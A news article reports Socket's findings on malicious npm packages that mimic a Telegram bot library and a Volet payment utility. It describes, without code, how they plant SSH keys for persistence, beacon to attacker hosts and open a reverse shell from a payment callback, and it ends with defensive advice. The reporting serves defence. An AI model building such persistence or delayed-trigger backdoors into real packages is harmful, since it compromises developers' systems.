Cybersecurity researchers have discovered three malicious packages in the npm registry that masquerade as a legitimate Telegram bot library. These packages not only deceive developers but also introduce SSH backdoors and enable data exfiltration on compromised systems. The findings were disclosed by supply chain security firm Socket, which highlighted the growing risks posed by malicious open-source software components.
Imitating a Popular Library
The three rogue npm packages uncovered are:
node-telegram-utils(132 downloads)node-telegram-bots-api(82 downloads)node-telegram-util(73 downloads)
While their download numbers may seem relatively low, experts warn that even a single compromised installation can result in serious consequences. These packages imitate the popular node-telegram-bot-api, a widely used Node.js wrapper for Telegram’s Bot API that has over 100,000 weekly downloads.
“While that number may sound modest, it only takes a single compromised environment to pave the way for wide-scale infiltration or unauthorized data access,” said Kush Pandya, a security researcher at Socket. “Supply chain security incidents repeatedly show that even a handful of installs can have catastrophic repercussions, especially when attackers gain direct access to developer systems or production servers.”
Starjacking: A Deceptive Technique
To boost their credibility and fool developers, the malicious packages employ a tactic called starjacking. This involves linking the package’s metadata to the GitHub repository of a legitimate open-source project—in this case, node-telegram-bot-api.
The npm registry does not currently validate whether the GitHub repository listed in a package’s description actually belongs to the package author. Attackers exploit this by making their packages appear more trustworthy and reputable than they truly are. This social engineering trick can deceive even seasoned developers, who may assume the package is legitimate based on GitHub popularity.
SSH Backdoors Targeting Linux Environments
Socket’s analysis revealed that the packages specifically target Linux systems, embedding SSH backdoors that persist even after the package is removed. Upon installation, the packages execute scripts that add two SSH public keys to the victim’s ~/.ssh/authorized_keys file. This grants the attacker persistent remote access to the system, enabling future exploits without the victim’s knowledge.
The malicious code also performs basic reconnaissance by:
- Retrieving the system’s username
- Fetching the external IP address via a request to
ipinfo[.]io/ip - Sending a beacon to
solana.validator[.]blogto confirm successful infection
What makes these packages particularly dangerous is their persistence. Even after uninstalling the malicious library, the SSH keys remain, leaving the system open to continuous exploitation.
“This kind of post-install persistence mechanism is a strong reminder that uninstalling a malicious package doesn’t necessarily neutralize the threat it introduced,” Socket warned.
Reverse Shell via Fake Payment Integration
In a related incident, Socket also exposed another malicious package, @naderabdi/merchant-advcash, which attempts to execute a reverse shell under specific runtime conditions. The package poses as a utility for integrating Volet (formerly Advcash), a platform that supports both cryptocurrency and fiat payments.
Unlike most malicious npm packages that run code during installation or import, @naderabdi/merchant-advcash delays execution until runtime—specifically when a payment success handler is triggered. This strategy reduces its likelihood of being detected during initial scans or analysis.
“The package contains hardcoded logic that opens a reverse shell to a remote server upon invocation of a payment success handler,” the Socket report noted. “This level of conditional execution allows the malware to stay dormant until triggered, making it particularly stealthy.”
This tactic reflects an increasing trend in open-source malware—embedding malicious logic in business logic paths, such as payment callbacks or admin features, to remain undetected until specific conditions are met.
Growing Risks in the Open-Source Ecosystem
These discoveries further highlight the vulnerabilities within the open-source software ecosystem, particularly in widely used package repositories like npm. Attackers increasingly target developers through supply chain attacks, knowing that compromising a single widely used package can lead to cascading damage across multiple applications and systems.
To mitigate risks, experts urge developers to:
- Vet packages before installation by examining their maintainers, download history, and repository links
- Use automated tools like Socket, Snyk, or npm audit to detect potential malware
- Monitor for any unauthorized changes in
.ssh/authorized_keysand conduct regular system audits
As the sophistication of malicious npm packages grows, the open-source community and security researchers must continue working together to improve trust and safety in software supply chains.
